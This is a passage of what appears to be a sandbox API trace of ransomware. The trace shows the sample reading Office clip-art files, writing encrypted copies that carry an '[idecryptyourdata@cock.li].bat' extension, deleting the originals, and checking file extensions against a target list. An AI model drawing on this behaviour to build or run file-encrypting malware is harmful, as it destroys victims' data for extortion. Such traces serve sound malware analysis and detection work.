dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.404] GetLastError () returned 0x0 [0182.404] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x21e8, lpOverlapped=0x0) returned 1 [0182.406] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x21f0, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x21f0, lpOverlapped=0x0) returned 1 [0182.408] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.408] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.408] SetEndOfFile (hFile=0x380) returned 1 [0182.408] CloseHandle (hObject=0x380) returned 1 [0182.408] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.408] SetEndOfFile (hFile=0x334) returned 1 [0182.409] CloseHandle (hObject=0x334) returned 1 [0182.409] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.410] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105600.wmf")) returned 1 [0182.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.410] lstrlenW (lpString=".doc") returned 4 [0182.410] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.410] lstrlenW (lpString=".docx") returned 5 [0182.410] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.410] lstrlenW (lpString=".pdf") returned 4 [0182.410] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.410] lstrlenW (lpString=".xls") returned 4 [0182.410] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.410] lstrlenW (lpString=".xlsx") returned 5 [0182.410] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.410] lstrlenW (lpString=".ppt") returned 4 [0182.410] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.410] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.410] lstrlenW (lpString=".zip") returned 4 [0182.410] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.410] lstrlenW (lpString=".rar") returned 4 [0182.410] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString=".bz2") returned 4 [0182.411] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString=".7z") returned 3 [0182.411] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.411] lstrlenW (lpString=".dbf") returned 4 [0182.411] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.411] lstrlenW (lpString=".1cd") returned 4 [0182.411] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.411] lstrlenW (lpString=".jpg") returned 4 [0182.411] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.411] lstrlenW (lpString=".doc") returned 4 [0182.411] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString=".docx") returned 5 [0182.411] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.411] lstrlenW (lpString=".pdf") returned 4 [0182.411] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString=".xls") returned 4 [0182.411] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.411] lstrlenW (lpString=".xlsx") returned 5 [0182.411] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.411] lstrlenW (lpString=".ppt") returned 4 [0182.411] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.411] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.412] lstrlenW (lpString=".zip") returned 4 [0182.412] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.412] lstrlenW (lpString=".rar") returned 4 [0182.412] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.412] lstrlenW (lpString=".bz2") returned 4 [0182.412] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.412] lstrlenW (lpString=".7z") returned 3 [0182.412] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.412] lstrlenW (lpString=".dbf") returned 4 [0182.412] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.412] lstrlenW (lpString=".1cd") returned 4 [0182.412] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105600.WMF") returned 68 [0182.412] lstrlenW (lpString=".jpg") returned 4 [0182.412] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.412] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.412] lstrlenW (lpString="J0105638.WMF") returned 12 [0182.412] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.413] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=10364) returned 1 [0182.413] CloseHandle (hObject=0x334) returned 1 [0182.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf")) returned 0x220 [0182.413] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.413] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.413] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.414] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.414] GetLastError () returned 0x0 [0182.414] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x287c, lpOverlapped=0x0) returned 1 [0182.416] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2880, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2880, lpOverlapped=0x0) returned 1 [0182.418] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.418] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.418] SetEndOfFile (hFile=0x380) returned 1 [0182.418] CloseHandle (hObject=0x380) returned 1 [0182.418] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.418] SetEndOfFile (hFile=0x334) returned 1 [0182.419] CloseHandle (hObject=0x334) returned 1 [0182.419] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.420] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105638.wmf")) returned 1 [0182.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.420] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.420] lstrlenW (lpString=".doc") returned 4 [0182.420] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.420] lstrlenW (lpString=".docx") returned 5 [0182.420] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.421] lstrlenW (lpString=".pdf") returned 4 [0182.421] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString=".xls") returned 4 [0182.421] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.421] lstrlenW (lpString=".xlsx") returned 5 [0182.421] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.421] lstrlenW (lpString=".ppt") returned 4 [0182.421] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.421] lstrlenW (lpString=".zip") returned 4 [0182.421] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.421] lstrlenW (lpString=".rar") returned 4 [0182.421] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString=".bz2") returned 4 [0182.421] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString=".7z") returned 3 [0182.421] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.421] lstrlenW (lpString=".dbf") returned 4 [0182.421] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.421] lstrlenW (lpString=".1cd") returned 4 [0182.421] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.421] lstrlenW (lpString=".jpg") returned 4 [0182.421] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.421] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.422] lstrlenW (lpString=".doc") returned 4 [0182.422] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString=".docx") returned 5 [0182.422] lstrcmpiW (lpString1=".docx", lpString2="8.WMF") returned -1 [0182.422] lstrlenW (lpString=".pdf") returned 4 [0182.422] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString=".xls") returned 4 [0182.422] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.422] lstrlenW (lpString=".xlsx") returned 5 [0182.422] lstrcmpiW (lpString1=".xlsx", lpString2="8.WMF") returned -1 [0182.422] lstrlenW (lpString=".ppt") returned 4 [0182.422] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.422] lstrlenW (lpString=".zip") returned 4 [0182.422] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.422] lstrlenW (lpString=".rar") returned 4 [0182.422] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString=".bz2") returned 4 [0182.422] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString=".7z") returned 3 [0182.422] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.422] lstrlenW (lpString=".dbf") returned 4 [0182.422] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.422] lstrlenW (lpString=".1cd") returned 4 [0182.422] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.422] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105638.WMF") returned 68 [0182.422] lstrlenW (lpString=".jpg") returned 4 [0182.422] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.423] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.423] lstrlenW (lpString="J0105710.WMF") returned 12 [0182.423] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.424] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=13808) returned 1 [0182.424] CloseHandle (hObject=0x334) returned 1 [0182.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf")) returned 0x220 [0182.424] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.424] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.424] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.424] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.425] GetLastError () returned 0x0 [0182.425] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x35f0, lpOverlapped=0x0) returned 1 [0182.427] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x3600, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x3600, lpOverlapped=0x0) returned 1 [0182.429] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x0, lpOverlapped=0x0) returned 1 [0182.429] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0xec, lpOverlapped=0x0) returned 1 [0182.429] SetEndOfFile (hFile=0x380) returned 1 [0182.429] CloseHandle (hObject=0x380) returned 1 [0182.430] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.430] SetEndOfFile (hFile=0x334) returned 1 [0182.431] CloseHandle (hObject=0x334) returned 1 [0182.431] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0182.431] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105710.wmf")) returned 1 [0182.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.431] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.431] lstrlenW (lpString=".doc") returned 4 [0182.431] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.431] lstrlenW (lpString=".docx") returned 5 [0182.431] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.431] lstrlenW (lpString=".pdf") returned 4 [0182.432] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString=".xls") returned 4 [0182.432] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.432] lstrlenW (lpString=".xlsx") returned 5 [0182.432] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.432] lstrlenW (lpString=".ppt") returned 4 [0182.432] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.432] lstrlenW (lpString=".zip") returned 4 [0182.432] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.432] lstrlenW (lpString=".rar") returned 4 [0182.432] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString=".bz2") returned 4 [0182.432] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString=".7z") returned 3 [0182.432] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.432] lstrlenW (lpString=".dbf") returned 4 [0182.432] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.432] lstrlenW (lpString=".1cd") returned 4 [0182.432] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.432] lstrlenW (lpString=".jpg") returned 4 [0182.432] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.432] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.432] lstrlenW (lpString=".doc") returned 4 [0182.433] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString=".docx") returned 5 [0182.433] lstrcmpiW (lpString1=".docx", lpString2="0.WMF") returned -1 [0182.433] lstrlenW (lpString=".pdf") returned 4 [0182.433] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString=".xls") returned 4 [0182.433] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0182.433] lstrlenW (lpString=".xlsx") returned 5 [0182.433] lstrcmpiW (lpString1=".xlsx", lpString2="0.WMF") returned -1 [0182.433] lstrlenW (lpString=".ppt") returned 4 [0182.433] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.433] lstrlenW (lpString=".zip") returned 4 [0182.433] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0182.433] lstrlenW (lpString=".rar") returned 4 [0182.433] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString=".bz2") returned 4 [0182.433] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString=".7z") returned 3 [0182.433] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0182.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.433] lstrlenW (lpString=".dbf") returned 4 [0182.433] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.433] lstrlenW (lpString=".1cd") returned 4 [0182.433] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0182.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105710.WMF") returned 68 [0182.433] lstrlenW (lpString=".jpg") returned 4 [0182.433] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0182.434] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0182.434] lstrlenW (lpString="J0105846.WMF") returned 12 [0182.434] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.434] GetFileSizeEx (in: hFile=0x334, lpFileSize=0x311ff14 | out: lpFileSize=0x311ff14*=8240) returned 1 [0182.434] CloseHandle (hObject=0x334) returned 1 [0182.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf")) returned 0x220 [0182.435] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0182.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x334 [0182.435] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.435] SetFilePointerEx (in: hFile=0x334, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x311fec0 | out: lpNewFilePointer=0x0) returned 1 [0182.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105846.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105846.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x380 [0182.733] GetLastError () returned 0x0 [0182.733] ReadFile (in: hFile=0x334, lpBuffer=0x3d12020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x311fecc, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesRead=0x311fecc*=0x2030, lpOverlapped=0x0) returned 1 [0182.737] WriteFile (in: hFile=0x380, lpBuffer=0x3d12020*, nNumberOfBytesToWrite=0x2040, lpNumberOfBytesWritten=0x311fc94, lpOverlapped=0x0 | out: lpBuffer=0x3d12020*, lpNumberOfBytesWritten=0x311fc94*=0x2040, 